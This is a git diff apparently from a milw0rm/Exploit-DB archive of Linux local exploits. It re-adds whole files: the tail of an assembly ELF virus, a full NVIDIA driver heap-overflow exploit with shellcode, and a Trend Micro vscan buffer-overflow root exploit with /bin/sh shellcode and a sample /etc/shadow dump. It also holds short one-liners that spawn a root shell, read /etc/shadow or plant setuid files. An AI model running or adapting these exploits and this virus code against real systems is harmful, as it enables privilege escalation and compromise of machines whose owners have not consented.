%eax # mprotect + movl %esp, %ebx + andl $0xfffff000, %ebx # pagina de pila + int $0x80 # + + +reconstruye_host: + movl $5, %eax # open + movl %edi, %ebx # argv[0] + xorl %ecx, %ecx # solo me puedo abrir a mi mismo en modo 0 + int $0x80 # (O_RDONLY) + + movl $end_vir, %esi # final-inicio+variable del final + subl $start_vir, %esi # esi -> virus length + + xorl %ecx, %ecx + movl %eax, %ebx # descriptor host + movl $19, %eax # lseek + movl $2, %edx # SEEK_END + int $0x80 # nos situamos al final del host-virsize + movl %eax, %edi # edi -> 
tamanyo del host + + pushl %ecx # offset: todo el file desde el inicio + pushl %ebx # descriptor + pushl $1 # mapa privado + pushl $1 # solo lectura (el descriptor esta modo 0) + pushl %eax # mapeamos todo el file + pushl %ecx # que me de el la address + movl $90, %eax + movl %esp, %ebx + int $0x80 + cmp $0xfffff000, %eax + jbe reconstruye + + int $3 # mapa incorrecto + +reconstruye: + addl %edi, %eax # eax -> final del mapa + subl %esi, %eax # eax -> inicio del saved _start + + movl %esi, virisize(%ebp) + movl %eax, savedstart(%ebp) + + movl $fin_paranoia, %ecx # como que no me puedo borrar a mi + subl $paranoia, %ecx # mismo, porque perderia la ejecucion + leal paranoia(%ebp), %esi # copio el codigo de borrado a otro + movl %esp, %edi # area de memoria y desvio la ejecucion + rep movsb # ahi. + jmp *%esp + +paranoia: + movl virisize(%ebp), %ecx + movl savedstart(%ebp), %esi # optimizable + leal start_vir(%ebp), %edi + rep movsb + +proteger_host: + movl $125, %eax # mprotect + leal start_vir(%ebp), %ebx + andl $0xfffff000, %ebx # pagina del bicho + movl $2000, %ecx # 2 paginas a desproteger + movl $5, %edx # r-x + int $0x80 # ahora ya tengo w ya puedo poner encima + # el codigo correcto de _start +proteger_pila: + movl $125, %eax # mprotect + movl %esp, %ebx + andl $0xfffff000, %ebx # pagina de pila + movl $6, %edx # rw- + int $0x80 # + + movl $6, %eax # close + int $0x80 # ebx descriptor + + + leal start_vir(%ebp), %eax + addl $424, %esp # ok + movl %eax, 8(%esp) # ok (en el saved ebp) + popal + jmp *%ebp + + +fin_paranoia: + +virisize: + .long 0x00000000 +savedstart: + .long 0x00000000 +shushi: + .string "/bin/chmod\0" + +end_vir: +####################################################################### + +notelf: + .string "NOT ELF OR INFECTED YET!!!\n\0" +fin: + +# milw0rm.com [2006-10-08] diff --git a/platforms/linux/local/255.pl b/platforms/linux/local/255.pl index a00fde2d0..89f5dbd76 100755 --- a/platforms/linux/local/255.pl 
+++ b/platforms/linux/local/255.pl @@ -47,6 +47,6 @@ for ($i += length($shellcode); $i < $len; $i += 4) { # [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ] local($ENV{'MANPAGER'}) = $buffer; exec("/usr/bin/man id"); - - -# milw0rm.com [2001-01-19] + + +# milw0rm.com [2001-01-19] diff --git a/platforms/linux/local/257.pl b/platforms/linux/local/257.pl index 0587e07bd..8fe181d32 100755 --- a/platforms/linux/local/257.pl +++ b/platforms/linux/local/257.pl @@ -59,6 +59,6 @@ if ($ENV{'DISPLAY'}) { local($ENV{'DISPLAY'}) = $buffer; exec("/usr/X11R6/bin/jazip"); - - -# milw0rm.com [2001-01-25] + + +# milw0rm.com [2001-01-25] diff --git a/platforms/linux/local/2581.c b/platforms/linux/local/2581.c index 06661189b..58e779c55 100755 --- a/platforms/linux/local/2581.c +++ b/platforms/linux/local/2581.c 
@@ -1,344 +1,344 @@ -/* - * Copyright (c) 2005 Matthieu Herrb - * Copyright (c) 2006 Derek Abdine, Marc Bevand - * - * Permission to use, copy, modify, and distribute this software for any - * purpose with or without fee is hereby granted, provided that the above - * copyright notice and this permission notice appear in all copies. - * - * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES - * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF - * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR - * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES - * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN - * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF - * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - * - * Exploit for Buffer Overflow in NVIDIA Binary Graphics Driver For Linux - * see http://www.rapid7.com/advisories/R7-0025.jsp for original advisory. - */ -#include -#include -#include - -#include -#include - -int done = 0; -unsigned long black_pixel; - -/* This exploit takes two arguments: - * o The lowest address past X's heap. - * o X's data address. - * - * Note the first address required is usually - * in the 0xbXXXXXXX range, as the exploit - * forces the nvidia driver to allocate a large - * sum of memory. - * - * This information can be easily taken using: - * cat /proc/`pgrep Xorg`/maps | head -n 5 - * - * On a sample system, this was: - * - * 08048000-081b8000 r-xp 00000000 09:02 58721202 /usr/bin/Xorg - * 081b8000-081c7000 rw-p 00170000 09:02 58721202 /usr/bin/Xorg - * 081c7000-08533000 rw-p 081c7000 00:00 0 [heap] - * b5bbc000-b60bd000 rw-s e35f9000 00:0d 12154 /dev/nvidia0 - * b60bd000-b6112000 rw-p b60bd000 00:00 0 - * - * Thus, one would use: - * - * ./nv_exploit 0xb5bbc000 0x081b8000 - * - * To run the exploit. 
Note that although the exploit "best guesses" - * the correct spot to write the shellcode, it may be off. This - * may be tweaked by modifying the 0x2C0000 in the source below. - * If the data is written to an incorrect location where vital - * X program data is stored, X will (eventually, if not immediately) - * crash. - * - * The exploit works by overwriting the address of free() in the - * Global Offset Table to an address offset relative to the supplied - * GOT address (second argument). The NVIDIA driver will then call - * Xfree, which will in turn call free() using the overwritten GOT - * entry and nop slide to the shellcode. - */ - - -/* The shellcode below will execute a shell script located - * at /tmp/nv. */ -unsigned char shellcode[] = - "\xb8\x02\x00\x00\x00\xcd\x80\x85\xc0\x75\xfe\x31\xc0\x68\x2f\x6e" - "\x76\x00\x68\x2f\x74\x6d\x70\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb8" - "\x0b\x00\x00\x00\xcd\x80"; - -typedef struct { - Display *display; - XtAppContext app; - Window win; - XftFont *font; - XftColor color, bg; - XftDraw *draw; - GC gc; -} XDataStr; - -static void -sigHandler(int sig) -{ - done = 1; -} - -int -createWin(XDataStr *data) -{ - u_long attributeMask; - XSetWindowAttributes attribute; - Window w; - Display *display = data->display; - int screen = DefaultScreen(display); - XGCValues gc_val; - Screen *s; - - attribute.background_pixel = WhitePixel(display, screen); - attribute.border_pixel = WhitePixel(display, screen); - attribute.bit_gravity = NorthWestGravity; - attribute.event_mask = ButtonPressMask|ButtonReleaseMask|KeyPressMask| - ExposureMask; - - attributeMask = - CWBorderPixel | - CWBackPixel | - CWEventMask | - CWBitGravity; - s = ScreenOfDisplay(data->display, screen); - - w = XCreateWindow(display, RootWindow(display, screen), 0, 0, - DisplayWidth(display, screen)/2, 150, - 0, DefaultDepth(display, screen), InputOutput, - DefaultVisual(display, screen), attributeMask, &attribute); - - data->font = XftFontOpen(display, screen, - 
XFT_FAMILY, XftTypeString, "mono", - XFT_SIZE, XftTypeInteger, 16, - NULL); - if (!XftColorAllocName(display, XDefaultVisual(display, screen), - DefaultColormap(display, screen), "red4", &data->color)) { - fprintf(stderr, "cannot get color"); - return -1; - } - if (!XftColorAllocName(display, XDefaultVisual(display, screen), - DefaultColormap(display, screen), "linen", &data->bg)) { - fprintf(stderr, "cannot get bg color"); - return -1; - } - data->draw = XftDrawCreate(display, w, DefaultVisual(display, screen), - DefaultColormap(display, screen)); - gc_val.foreground = BlackPixel(display, screen); - gc_val.background = WhitePixel(display, screen); - data->gc = XCreateGC (display, w, GCForeground|GCBackground, - &gc_val); - - data->win = w; - return 0; -} - -void -show(XDataStr *data) -{ - Status s; - - XMapWindow(data->display, data->win); - s = XGrabKeyboard(data->display, data->win, False, - GrabModeAsync, GrabModeAsync, CurrentTime); - if (s != GrabSuccess) { - printf("Error grabing kbd %d\n", s); - } -} - -int -main(int argc, char *argv[]) -{ - Display *display; - Widget toplevel; - XtAppContext app_con; - XEvent event; - char c, *string; - unsigned int i; - XDataStr *data; - XExposeEvent *expose = (XExposeEvent *)&event; - unsigned int heapaddr, gotaddr; - - if (argc > 2) - { - heapaddr = strtoul(argv[1],NULL,0); - gotaddr = strtoul(argv[2],NULL,0); - } - else - { - printf("Usage: %s \n\n", argv[0]); - return 0; - } - - toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0, - &argc, argv, NULL, NULL, 0); - display = XtDisplay(toplevel); - - data = (XDataStr *)malloc(sizeof(XDataStr)); - if (data == NULL) { - perror("malloc"); - exit(EXIT_FAILURE); - } - - data->display = display; - data->app = app_con; - - if (createWin(data) < 0) { - fprintf(stderr, "can't create Data Window"); - exit(EXIT_FAILURE); - } - show(data); - - signal(SIGINT, sigHandler); - signal(SIGHUP, sigHandler); - signal(SIGQUIT, sigHandler); - signal(SIGTERM, sigHandler); - - 
/************************************************************************ - * BEGIN FONT HEAP OVERFLOW SETUP CODE - * - * "It's so hard to write a graphics driver that open-sourcing it would - * not help." - * - Andrew Fear, Software Product Manager (NVIDIA Corporation). - **********************************************************************/ - XGlyphInfo * glyphs; - XRenderPictFormat fmt; - XRenderPictFormat *mask = 0; - GlyphSet gset; - char * buf =0; - int offset, cr, numB; - int xscreenpos = 32680; - int magic_len = 32768 - xscreenpos; - int wr_addr_len = 3548; - int wr_nop_len = 200; - - /* Calculate the offset to the Global Offset Table. - * 0x2C0000 is the size of the buffer the NVIDIA driver - * allocates for us when it is about to draw. - */ - offset = gotaddr-(heapaddr-0x2C0000); - offset += magic_len; - glyphs = malloc(sizeof(XGlyphInfo)*3); - - /* Payload glyph */ - glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */ - glyphs[0].height = 1; - glyphs[0].yOff = 0; - glyphs[0].xOff = glyphs[0].width; - glyphs[0].x = 0; - glyphs[0].y = 0; - - /* Large offset glyph (untweaked) */ - glyphs[1].width=0; - glyphs[1].height=0; - glyphs[1].yOff=32767; - glyphs[1].xOff=0; - glyphs[1].x = 0; - glyphs[1].y = 0; - - /* Small offset glyph (tweaked) */ - glyphs[2].width=0; - glyphs[2].height=0; - glyphs[2].yOff=0; - glyphs[2].xOff=0; - glyphs[2].x = 0; - glyphs[2].y = 0; - - fmt.type = PictTypeDirect; - fmt.depth = 8; - - Glyph * xglyphids = malloc(3*sizeof(Glyph)); - - xglyphids[0] = 'A'; - xglyphids[1] = 'B'; - xglyphids[2] = 'C'; - - int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */ - int bufsize = stride*glyphs[0].height; - buf = malloc(bufsize); - - /* Write jump address to the buffer a number of times */ - for (cr=0; crdraw, &data->bg, - expose->x, expose->y, - expose->width, expose->height); - /* Send malignant glyphs and execute shellcode on target */ - XRenderCompositeString8(display, PictOpOver, - 
XftDrawSrcPicture(data->draw, &data->color), - XftDrawPicture(data->draw), mask, gset, - 0, 0, xscreenpos, 0, string, strlen(string)); - break; - } - } - - free(glyphs); - free(xglyphids); - free(buf); - free(string); - - XFlush(display); - XUnmapWindow(data->display, data->win); - XUngrabKeyboard(data->display, CurrentTime); - XCloseDisplay(display); - exit(EXIT_SUCCESS); -} - -// milw0rm.com [2006-10-16] +/* + * Copyright (c) 2005 Matthieu Herrb + * Copyright (c) 2006 Derek Abdine, Marc Bevand + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + * + * Exploit for Buffer Overflow in NVIDIA Binary Graphics Driver For Linux + * see http://www.rapid7.com/advisories/R7-0025.jsp for original advisory. + */ +#include +#include +#include + +#include +#include + +int done = 0; +unsigned long black_pixel; + +/* This exploit takes two arguments: + * o The lowest address past X's heap. + * o X's data address. + * + * Note the first address required is usually + * in the 0xbXXXXXXX range, as the exploit + * forces the nvidia driver to allocate a large + * sum of memory. 
+ * + * This information can be easily taken using: + * cat /proc/`pgrep Xorg`/maps | head -n 5 + * + * On a sample system, this was: + * + * 08048000-081b8000 r-xp 00000000 09:02 58721202 /usr/bin/Xorg + * 081b8000-081c7000 rw-p 00170000 09:02 58721202 /usr/bin/Xorg + * 081c7000-08533000 rw-p 081c7000 00:00 0 [heap] + * b5bbc000-b60bd000 rw-s e35f9000 00:0d 12154 /dev/nvidia0 + * b60bd000-b6112000 rw-p b60bd000 00:00 0 + * + * Thus, one would use: + * + * ./nv_exploit 0xb5bbc000 0x081b8000 + * + * To run the exploit. Note that although the exploit "best guesses" + * the correct spot to write the shellcode, it may be off. This + * may be tweaked by modifying the 0x2C0000 in the source below. + * If the data is written to an incorrect location where vital + * X program data is stored, X will (eventually, if not immediately) + * crash. + * + * The exploit works by overwriting the address of free() in the + * Global Offset Table to an address offset relative to the supplied + * GOT address (second argument). The NVIDIA driver will then call + * Xfree, which will in turn call free() using the overwritten GOT + * entry and nop slide to the shellcode. + */ + + +/* The shellcode below will execute a shell script located + * at /tmp/nv. 
*/ +unsigned char shellcode[] = + "\xb8\x02\x00\x00\x00\xcd\x80\x85\xc0\x75\xfe\x31\xc0\x68\x2f\x6e" + "\x76\x00\x68\x2f\x74\x6d\x70\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb8" + "\x0b\x00\x00\x00\xcd\x80"; + +typedef struct { + Display *display; + XtAppContext app; + Window win; + XftFont *font; + XftColor color, bg; + XftDraw *draw; + GC gc; +} XDataStr; + +static void +sigHandler(int sig) +{ + done = 1; +} + +int +createWin(XDataStr *data) +{ + u_long attributeMask; + XSetWindowAttributes attribute; + Window w; + Display *display = data->display; + int screen = DefaultScreen(display); + XGCValues gc_val; + Screen *s; + + attribute.background_pixel = WhitePixel(display, screen); + attribute.border_pixel = WhitePixel(display, screen); + attribute.bit_gravity = NorthWestGravity; + attribute.event_mask = ButtonPressMask|ButtonReleaseMask|KeyPressMask| + ExposureMask; + + attributeMask = + CWBorderPixel | + CWBackPixel | + CWEventMask | + CWBitGravity; + s = ScreenOfDisplay(data->display, screen); + + w = XCreateWindow(display, RootWindow(display, screen), 0, 0, + DisplayWidth(display, screen)/2, 150, + 0, DefaultDepth(display, screen), InputOutput, + DefaultVisual(display, screen), attributeMask, &attribute); + + data->font = XftFontOpen(display, screen, + XFT_FAMILY, XftTypeString, "mono", + XFT_SIZE, XftTypeInteger, 16, + NULL); + if (!XftColorAllocName(display, XDefaultVisual(display, screen), + DefaultColormap(display, screen), "red4", &data->color)) { + fprintf(stderr, "cannot get color"); + return -1; + } + if (!XftColorAllocName(display, XDefaultVisual(display, screen), + DefaultColormap(display, screen), "linen", &data->bg)) { + fprintf(stderr, "cannot get bg color"); + return -1; + } + data->draw = XftDrawCreate(display, w, DefaultVisual(display, screen), + DefaultColormap(display, screen)); + gc_val.foreground = BlackPixel(display, screen); + gc_val.background = WhitePixel(display, screen); + data->gc = XCreateGC (display, w, GCForeground|GCBackground, + 
&gc_val); + + data->win = w; + return 0; +} + +void +show(XDataStr *data) +{ + Status s; + + XMapWindow(data->display, data->win); + s = XGrabKeyboard(data->display, data->win, False, + GrabModeAsync, GrabModeAsync, CurrentTime); + if (s != GrabSuccess) { + printf("Error grabing kbd %d\n", s); + } +} + +int +main(int argc, char *argv[]) +{ + Display *display; + Widget toplevel; + XtAppContext app_con; + XEvent event; + char c, *string; + unsigned int i; + XDataStr *data; + XExposeEvent *expose = (XExposeEvent *)&event; + unsigned int heapaddr, gotaddr; + + if (argc > 2) + { + heapaddr = strtoul(argv[1],NULL,0); + gotaddr = strtoul(argv[2],NULL,0); + } + else + { + printf("Usage: %s \n\n", argv[0]); + return 0; + } + + toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0, + &argc, argv, NULL, NULL, 0); + display = XtDisplay(toplevel); + + data = (XDataStr *)malloc(sizeof(XDataStr)); + if (data == NULL) { + perror("malloc"); + exit(EXIT_FAILURE); + } + + data->display = display; + data->app = app_con; + + if (createWin(data) < 0) { + fprintf(stderr, "can't create Data Window"); + exit(EXIT_FAILURE); + } + show(data); + + signal(SIGINT, sigHandler); + signal(SIGHUP, sigHandler); + signal(SIGQUIT, sigHandler); + signal(SIGTERM, sigHandler); + + /************************************************************************ + * BEGIN FONT HEAP OVERFLOW SETUP CODE + * + * "It's so hard to write a graphics driver that open-sourcing it would + * not help." + * - Andrew Fear, Software Product Manager (NVIDIA Corporation). + **********************************************************************/ + XGlyphInfo * glyphs; + XRenderPictFormat fmt; + XRenderPictFormat *mask = 0; + GlyphSet gset; + char * buf =0; + int offset, cr, numB; + int xscreenpos = 32680; + int magic_len = 32768 - xscreenpos; + int wr_addr_len = 3548; + int wr_nop_len = 200; + + /* Calculate the offset to the Global Offset Table. 
+ * 0x2C0000 is the size of the buffer the NVIDIA driver + * allocates for us when it is about to draw. + */ + offset = gotaddr-(heapaddr-0x2C0000); + offset += magic_len; + glyphs = malloc(sizeof(XGlyphInfo)*3); + + /* Payload glyph */ + glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */ + glyphs[0].height = 1; + glyphs[0].yOff = 0; + glyphs[0].xOff = glyphs[0].width; + glyphs[0].x = 0; + glyphs[0].y = 0; + + /* Large offset glyph (untweaked) */ + glyphs[1].width=0; + glyphs[1].height=0; + glyphs[1].yOff=32767; + glyphs[1].xOff=0; + glyphs[1].x = 0; + glyphs[1].y = 0; + + /* Small offset glyph (tweaked) */ + glyphs[2].width=0; + glyphs[2].height=0; + glyphs[2].yOff=0; + glyphs[2].xOff=0; + glyphs[2].x = 0; + glyphs[2].y = 0; + + fmt.type = PictTypeDirect; + fmt.depth = 8; + + Glyph * xglyphids = malloc(3*sizeof(Glyph)); + + xglyphids[0] = 'A'; + xglyphids[1] = 'B'; + xglyphids[2] = 'C'; + + int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */ + int bufsize = stride*glyphs[0].height; + buf = malloc(bufsize); + + /* Write jump address to the buffer a number of times */ + for (cr=0; crdraw, &data->bg, + expose->x, expose->y, + expose->width, expose->height); + /* Send malignant glyphs and execute shellcode on target */ + XRenderCompositeString8(display, PictOpOver, + XftDrawSrcPicture(data->draw, &data->color), + XftDrawPicture(data->draw), mask, gset, + 0, 0, xscreenpos, 0, string, strlen(string)); + break; + } + } + + free(glyphs); + free(xglyphids); + free(buf); + free(string); + + XFlush(display); + XUnmapWindow(data->display, data->win); + XUngrabKeyboard(data->display, CurrentTime); + XCloseDisplay(display); + exit(EXIT_SUCCESS); +} + +// milw0rm.com [2006-10-16] diff --git a/platforms/linux/local/273.c b/platforms/linux/local/273.c index b8e56ae96..b0be182eb 100755 --- a/platforms/linux/local/273.c +++ b/platforms/linux/local/273.c 
@@ -57,6 +57,6 @@ return 0; }
-
-
-// milw0rm.com [2004-04-20]
+
+
+// milw0rm.com [2004-04-20]
diff --git a/platforms/linux/local/285.c b/platforms/linux/local/285.c
index 807276b90..c122c9c79 100755
--- a/platforms/linux/local/285.c
+++ b/platforms/linux/local/285.c
@@ -45,6 +45,6 @@ int main(int argc, char **argv) {
 printf("Hit ' . ' to go \n");
 execl("/usr/bin/Mail","Mail","x","-s","x","-c",buffer,0);
 }
-
-
-// milw0rm.com [2001-03-03]
+
+
+// milw0rm.com [2001-03-03]
diff --git a/platforms/linux/local/290.sh b/platforms/linux/local/290.sh
index 626520664..bf8c06368 100755
--- a/platforms/linux/local/290.sh
+++ b/platforms/linux/local/290.sh
@@ -20,6 +20,6 @@ chmod 6755 /var/tmp/.nothing rm /etc/initscript _init_
-echo i nawet go podmienilem
-
-# milw0rm.com [2001-03-04]
+echo i nawet go podmienilem
+
+# milw0rm.com [2001-03-04]
diff --git a/platforms/linux/local/317.txt b/platforms/linux/local/317.txt
index bd3ecd413..7b9bf4512 100755
--- a/platforms/linux/local/317.txt
+++ b/platforms/linux/local/317.txt
@@ -1,3 +1,3 @@
-setenv RESOLV_HOST_CONF /etc/shadow; ping adfas
-
-# milw0rm.com [1996-01-01]
+setenv RESOLV_HOST_CONF /etc/shadow; ping adfas
+
+# milw0rm.com [1996-01-01]
diff --git a/platforms/linux/local/320.pl b/platforms/linux/local/320.pl
index ed52fd6a0..8bd07f997 100755
--- a/platforms/linux/local/320.pl
+++ b/platforms/linux/local/320.pl
@@ -2,6 +2,6 @@ $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash");
-
-
-# milw0rm.com [1996-06-01]
+
+
+# milw0rm.com [1996-06-01]
diff --git a/platforms/linux/local/3213.c b/platforms/linux/local/3213.c
index 00210a1c1..c046b3f4b 100755
--- a/platforms/linux/local/3213.c
+++ b/platforms/linux/local/3213.c
@@ -1,155 +1,155 @@ -/* - - Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) - - Author: Sebastian Wolfgarten / sebastian@wolfgarten.com / http://www.devtarget.org - - Date: January 3rd, 2007 - - Severity: Medium - - Description: - - The product "InterScan VirusWall 3.81 for Linux" ships a library called - "libvsapi.so" which is vulnerable to a memory corruption vulnerability. - - One of the applications that apparently uses this library is called "vscan" - which is set suid root by default. It was discovered that this supporting - program is prone to a classic buffer overflow vulnerability when a particularly - long command-line argument is being passed and the application utilizes the flawed - library to attempt to copy that data into a finite buffer. - - As vscan is set suid root, this leads to arbitrary code execution with root level - privileges. However the severity of this vulnerability is probably "medium" as by default - the vscan file is only executable by the root user as well as members of the "iscan" - group which is created during the installation of the software. - - Example: - - sebastian@debian31:~$ ./tmvwall381v3_exp - - Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) - Author: Sebastian Wolfgarten, - Date: January 3rd, 2007 - - Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. - - Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! - Virus Scanner v3.1, VSAPI v8.310-1002 - Trend Micro Inc. 
1996,1997 - Pattern number 4.155.00 - - sh-2.05b# id - uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) - - sh-2.05b# cat /etc/shadow - - root:***REMOVED***:13372:0:99999:7::: - daemon:*:13372:0:99999:7::: - bin:*:13372:0:99999:7::: - sys:*:13372:0:99999:7::: - sync:*:13372:0:99999:7::: - games:*:13372:0:99999:7::: - man:*:13372:0:99999:7::: - lp:*:13372:0:99999:7::: - mail:*:13372:0:99999:7::: - news:*:13372:0:99999:7::: - uucp:*:13372:0:99999:7::: - proxy:*:13372:0:99999:7::: - www-data:*:13372:0:99999:7::: - backup:*:13372:0:99999:7::: - list:*:13372:0:99999:7::: - irc:*:13372:0:99999:7::: - gnats:*:13372:0:99999:7::: - nobody:*:13372:0:99999:7::: - Debian-exim:!:13372:0:99999:7::: - sshd:!:13372:0:99999:7::: - postfix:!:13500:0:99999:7::: - mysql:!:13500:0:99999:7::: - vmail:!:13500:0:99999:7::: - amavis:!:13500:0:99999:7::: - iscan:!:13500:0:99999:7::: - sebastian:***REMOVED***:13500:0:99999:7::: - - Credits: - - Must go to Aleph One for the shellcode and mercy for bits of the code. - -*/ - -#include -#include -#include - -#define NOP 0x90 -#define vscan "/opt/trend/ISBASE/IScan.BASE/vscan" - -// Shellcode by Aleph One -char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" - "\x80\xe8\xdc\xff\xff\xff/bin/sh"; - -unsigned long get_sp(void) { - - __asm__("movl %esp, %eax"); - -} - -int main(int argc, char *argv[], char **envp) { - - // Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP) - int buff = 1120; - - // Address of the shellcode - unsigned long addr; - - // Temporarily used to add nops etc. - char *ptr; - - printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)\n"); - printf("Author: Sebastian Wolfgarten, \n"); - printf("Date: January 3rd, 2007\n\n"); - - // Check permissions on vscan executable, if this fails exploitation is infeasible. 
- if (access(vscan, 01) != -1) { - - printf("Okay, %s is executable and by the way, your current user id is %d.\n",vscan,getuid()); - - // Allocate memory for filling the buffer - if((ptr = (char *)malloc(buff)) == NULL) { - - printf("Error allocating memory!\n"); - exit(-1); - - } - - // Determine the address of the shellcode with the inline assembly above - addr = get_sp(); - - // Add the NOP's to the buffer - memset(ptr, NOP, buff); - - // Add the shellcode - memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); - - // The return address - *(long *)&ptr[buff - 4] = addr; - - // Off we go, execute the vulnerable program - printf("\nExecuting %s. Afterwards check your privilege level with id or whoami!\n",vscan); - execl(vscan, "vscan", ptr, NULL); - - } else { - - printf("Exploit failed. You seem not to have enough privileges to execute %s, sorry.\n",vscan); - printf("Hint: Ask your local admin to add yourself to the iscan group or let him make the vscan binary world-executable.\n"); - printf("Then try again :-)\n\n"); - exit(1); - - } - - return 0; - -} - -// milw0rm.com [2007-01-28] +/* + + Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) + + Author: Sebastian Wolfgarten / sebastian@wolfgarten.com / http://www.devtarget.org + + Date: January 3rd, 2007 + + Severity: Medium + + Description: + + The product "InterScan VirusWall 3.81 for Linux" ships a library called + "libvsapi.so" which is vulnerable to a memory corruption vulnerability. + + One of the applications that apparently uses this library is called "vscan" + which is set suid root by default. It was discovered that this supporting + program is prone to a classic buffer overflow vulnerability when a particularly + long command-line argument is being passed and the application utilizes the flawed + library to attempt to copy that data into a finite buffer. + + As vscan is set suid root, this leads to arbitrary code execution with root level + privileges. 
However the severity of this vulnerability is probably "medium" as by default + the vscan file is only executable by the root user as well as members of the "iscan" + group which is created during the installation of the software. + + Example: + + sebastian@debian31:~$ ./tmvwall381v3_exp + + Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) + Author: Sebastian Wolfgarten, + Date: January 3rd, 2007 + + Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. + + Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! + Virus Scanner v3.1, VSAPI v8.310-1002 + Trend Micro Inc. 1996,1997 + Pattern number 4.155.00 + + sh-2.05b# id + uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) + + sh-2.05b# cat /etc/shadow + + root:***REMOVED***:13372:0:99999:7::: + daemon:*:13372:0:99999:7::: + bin:*:13372:0:99999:7::: + sys:*:13372:0:99999:7::: + sync:*:13372:0:99999:7::: + games:*:13372:0:99999:7::: + man:*:13372:0:99999:7::: + lp:*:13372:0:99999:7::: + mail:*:13372:0:99999:7::: + news:*:13372:0:99999:7::: + uucp:*:13372:0:99999:7::: + proxy:*:13372:0:99999:7::: + www-data:*:13372:0:99999:7::: + backup:*:13372:0:99999:7::: + list:*:13372:0:99999:7::: + irc:*:13372:0:99999:7::: + gnats:*:13372:0:99999:7::: + nobody:*:13372:0:99999:7::: + Debian-exim:!:13372:0:99999:7::: + sshd:!:13372:0:99999:7::: + postfix:!:13500:0:99999:7::: + mysql:!:13500:0:99999:7::: + vmail:!:13500:0:99999:7::: + amavis:!:13500:0:99999:7::: + iscan:!:13500:0:99999:7::: + sebastian:***REMOVED***:13500:0:99999:7::: + + Credits: + + Must go to Aleph One for the shellcode and mercy for bits of the code. 
+ +*/ + +#include +#include +#include + +#define NOP 0x90 +#define vscan "/opt/trend/ISBASE/IScan.BASE/vscan" + +// Shellcode by Aleph One +char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" + "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" + "\x80\xe8\xdc\xff\xff\xff/bin/sh"; + +unsigned long get_sp(void) { + + __asm__("movl %esp, %eax"); + +} + +int main(int argc, char *argv[], char **envp) { + + // Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP) + int buff = 1120; + + // Address of the shellcode + unsigned long addr; + + // Temporarily used to add nops etc. + char *ptr; + + printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)\n"); + printf("Author: Sebastian Wolfgarten, \n"); + printf("Date: January 3rd, 2007\n\n"); + + // Check permissions on vscan executable, if this fails exploitation is infeasible. + if (access(vscan, 01) != -1) { + + printf("Okay, %s is executable and by the way, your current user id is %d.\n",vscan,getuid()); + + // Allocate memory for filling the buffer + if((ptr = (char *)malloc(buff)) == NULL) { + + printf("Error allocating memory!\n"); + exit(-1); + + } + + // Determine the address of the shellcode with the inline assembly above + addr = get_sp(); + + // Add the NOP's to the buffer + memset(ptr, NOP, buff); + + // Add the shellcode + memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); + + // The return address + *(long *)&ptr[buff - 4] = addr; + + // Off we go, execute the vulnerable program + printf("\nExecuting 